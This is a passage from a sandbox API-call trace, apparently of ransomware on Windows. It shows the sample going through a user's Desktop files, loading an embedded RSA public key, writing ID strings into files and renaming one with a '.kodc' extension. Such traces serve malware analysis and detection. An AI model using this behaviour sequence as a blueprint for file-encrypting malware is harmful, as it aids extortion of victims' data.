hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ef0 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ef0 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f20 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ed8 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ec0 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5c50 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.921] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x8559, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x8559, lpOverlapped=0x0) returned 1 [0100.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0100.921] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x855e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.921] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.921] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.921] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.921] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.922] CloseHandle (hObject=0x5cc) returned 1 [0100.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dc90 | out: hHeap=0x630000) returned 1 [0100.926] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\36xpR72G.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\36xpr72g.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\36xpR72G.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\36xpr72g.avi.kodc")) returned 1 [0100.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.926] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0100.927] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5272e00, ftCreationTime.dwHighDateTime=0x1d5c50e, ftLastAccessTime.dwLowDateTime=0xebb36280, ftLastAccessTime.dwHighDateTime=0x1d5c3b0, ftLastWriteTime.dwLowDateTime=0xebb36280, ftLastWriteTime.dwHighDateTime=0x1d5c3b0, nFileSizeHigh=0x0, nFileSizeLow=0x155c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c9ton.xls", cAlternateFileName="")) returned 1 [0100.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0100.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.928] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\c9ton.xls") returned=".xls" [0100.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\c9ton.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\c9ton.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.928] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=87490) returned 1 [0100.928] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.931] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1559c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.931] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.932] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x155c2, lpOverlapped=0x0) returned 1 [0100.932] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.932] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.933] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.933] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0100.933] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.933] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.933] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.934] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.934] GetLastError () returned 0x0 [0100.934] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.934] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0100.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.934] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.934] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.934] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x155c0) returned 0x9bb8968 [0100.934] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5c50 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ec0 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5c98 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ed8 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f08 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f20 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.935] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f20 | out: hHeap=0x630000) returned 1 [0100.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f20 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7f08 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f20 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f08 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.936] GetCurrentThreadId () returned 0x42c [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7a08 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.936] GetCurrentThreadId () returned 0x42c [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f08 [0100.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f20 [0100.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ef0 [0100.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f38 [0100.938] HeapFree (in: hHeap=0x630000, 